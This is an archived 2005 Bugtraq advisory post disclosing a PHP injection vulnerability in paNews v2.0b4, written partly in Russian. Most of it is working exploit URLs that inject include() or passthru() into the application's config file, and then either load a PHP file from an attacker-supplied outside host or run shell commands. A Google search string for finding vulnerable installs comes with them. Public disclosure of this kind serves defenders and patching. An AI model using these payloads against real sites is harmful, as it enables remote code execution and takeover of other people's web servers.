bugtraq - paNews v2.0b4 - PHP Injection

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives

Hash Suite: Windows password security audit tool. GUI, reports in PDF.

[<prev] [next>] [day] [month] [year] [list]

Message-ID: <721562252.20050221071330@navigator.lv>
Date: Mon, 21 Feb 2005 07:13:30 +0200
From: tjomka <tjomka@...igator.lv>
To: bugtraq@...urityfocus.com
Subject: paNews v2.0b4 - PHP Injection

oooo   oooo oooooooo8 ooooooooooo
 8888o  88 888        88  888  88 
 88 888o88  888oooooo     888     
 88   8888         888    888     
o88o    88 o88oooo888    o888o    
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: paNews v2.0b4
* Bug found by: тёмыч
* Date: 20.02.2005
********************************

web: http://www.phparena.net/panews.php
google: allintitle:paNews v2.0b4

PHP Injection
Бага работает только если:
1. register_globals=On
2. на папку includes стоят права на запись

p.s. отрубите яваскрипты - javascripts =-]

Example 1

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)

then:

http://victim/panews/includes/config.php?nst=http://your/file.php


Example 2

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

then:

http://victim/panews/includes/config.php?nst=id
View attachment "paNews_v2.0b4.txt" of type "text/plain" (1172 bytes)